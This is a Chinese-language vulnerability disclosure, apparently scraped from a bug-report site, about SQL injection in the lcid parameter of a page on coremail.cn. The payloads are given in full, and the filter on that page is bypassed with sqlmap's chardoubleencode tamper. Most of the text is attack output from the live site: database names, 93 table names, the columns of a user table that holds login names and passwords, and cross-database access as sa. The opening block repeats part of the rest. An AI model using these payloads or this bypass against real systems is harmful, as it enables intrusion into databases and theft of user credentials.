VULHUB ™

### 简要描述： coremail官网存在注入，有防护，可绕过。 ### 详细说明： 漏洞地址：http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412 ### 漏洞证明： 有防护，直接用sqlmap加个tamper=chardoubleencode.py可以跑出来。 这个是sqlmap用的payload： Place: GET Parameter: lcid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lcid=412) AND 4972=4972 AND (7728=7728 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: lcid=412) UNION ALL SELECT...

### 简要描述： coremail官网存在注入，有防护，可绕过。 ### 详细说明： 漏洞地址：http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412 ### 漏洞证明： 有防护，直接用sqlmap加个tamper=chardoubleencode.py可以跑出来。 这个是sqlmap用的payload： Place: GET Parameter: lcid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lcid=412) AND 4972=4972 AND (7728=7728 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: lcid=412) UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: lcid=412) AND 6450=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8683=8683 --- 跑出的基本内容： web server operating system: Windows web application technology: ASP.NET, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2005 跑出来的数据库： available databases [7]: [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] ysxx201412197372 当前库自然就是ysxx201412197372， 数据表： back-end DBMS: Microsoft SQL Server 2005 Database: ysxx201412197372 [93 tables] +----------------------------+ | Whir_Cmn_Area | | Whir_Cnt_Attached | | Whir_Cnt_CreateLog | | Whir_Cnt_Relation | | Whir_Cnt_SubjectClass | | Whir_Cnt_SubjectClass | | Whir_Cnt_SubjectColumn | | Whir_Cnt_WorkFlowLogs | | Whir_Dev_Column | | Whir_Dev_ConfigStrategy | | Whir_Dev_Field | | Whir_Dev_FormArea | | Whir_Dev_FormArea | | Whir_Dev_FormDate | | Whir_Dev_FormOption | | Whir_Dev_FormUpload | | Whir_Dev_Menu | | Whir_Dev_Model | | Whir_Dev_Module | | Whir_Dev_Plugin | | Whir_Dev_SubmitForm | | Whir_Ext_AuditActivity | | Whir_Ext_Backup | | Whir_Ext_CollectField | | Whir_Ext_CollectField | | Whir_Ext_Gather | | Whir_Ext_GatherTable | | Whir_Ext_OperateLog | | Whir_Ext_SendEmailRecord | | Whir_Ext_SensitiveWords | | Whir_Ext_Tools | | Whir_Ext_Upload | | Whir_Ext_WorkFlow | | Whir_Mem_MemberGroup | | Whir_Mem_MemberGroup | | Whir_Oa_NewsConfig | | Whir_Oa_NewsTemp | | Whir_Plu_AdvertPosition | | Whir_Plu_AdvertPosition | | Whir_Plu_SiteMap | | Whir_Sec_Resources | | Whir_Sec_RolesInResources | | Whir_Sec_RolesInResources | | Whir_Sec_Users | | Whir_Sit_SiteInfo | | Whir_U_Category_Bak | | Whir_U_Category_Bak | | Whir_U_Content_Bak | | Whir_U_Content_Bak | | Whir_U_Content_Category | | Whir_U_Download_Bak | | Whir_U_Download_Bak | | Whir_U_Download_Category | | Whir_U_Feedback_Bak | | Whir_U_Feedback_Bak | | Whir_U_Forms_Bak | | Whir_U_Forms_Bak | | Whir_U_Jobs_Bak | | Whir_U_Jobs_Bak | | Whir_U_Jobs_Category | | Whir_U_Jobs_JobRequest | | Whir_U_Links_Bak | | Whir_U_Links_Bak | | Whir_U_Magazine_Bak | | Whir_U_Magazine_Bak | | Whir_U_Magazine_Chapter | | Whir_U_Magazine_Infor | | Whir_U_Product_Bak | | Whir_U_Product_Bak | | Whir_U_Product_Category | | Whir_U_SalesNet_Bak | | Whir_U_SalesNet_Bak | | Whir_U_SinglePage_Bak | | Whir_U_SinglePage_Bak | | Whir_U_SubContent_Bak | | Whir_U_SubContent_Bak | | Whir_U_SubContent_Category | | Whir_U_SubForms_Bak | | Whir_U_SubForms_Bak | | Whir_U_SubPage_Bak | | Whir_U_SubPage_Bak | | Whir_U_SubProduct_Bak | | Whir_U_SubProduct_Bak | | Whir_U_SubProduct_Category | | Whir_U_Survey_Answer | | Whir_U_Survey_Answer | | Whir_U_Survey_Bak | | Whir_U_Survey_Detail | | Whir_U_Survey_Question | | Whir_U_Vote_Answer | | Whir_U_Vote_Answer | | Whir_U_Vote_Bak | | Whir_U_Vote_Detail | +----------------------------+ 下面是表：Whir_Sec_Users Table: Whir_Sec_Users [19 columns] +----------------+ | Column | +----------------+ | CreateDate | | CreateUser | | Email | | IsDel | | LastLoginIP | | LastLoginTime | | LoginName | | LoginType | | Password | | RealName | | Remarks | | RolesId | | Sort | | State | | SystemLanguage | | SystemSkin | | UpdateDate | | UpdateUser | | UserId | +----------------+ [<img src="https://images.seebug.org/upload/201504/2123174057d2cd3c9fe987c277d64a5b215c05d1.jpg" alt="8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2123174057d2cd3c9fe987c277d64a5b215c05d1.jpg) 当前用户sa，可以跨库查询： Database: ReportServer [27 tables] +--------------------------+ | ActiveSubscriptions | | Batch | | CachePolicy | | ChunkData | | ConfigurationInfo | | DataSource | | Event | | ExecutionLog | | History | | ModelDrill | | ModelItemPolicy | | ModelPerspective | | Notifications | | Policies | | PolicyUserRole | | ReportSchedule | | Roles | | RunningJobs | | Schedule | | SecData | | ServerParametersInstance | | SnapshotData | | Subscriptions | | UpgradeInfo | | Users | | Catalog | | Keys | +--------------------------+ 可以拖库。。。。-_- 我没拖， 没拖， 拖....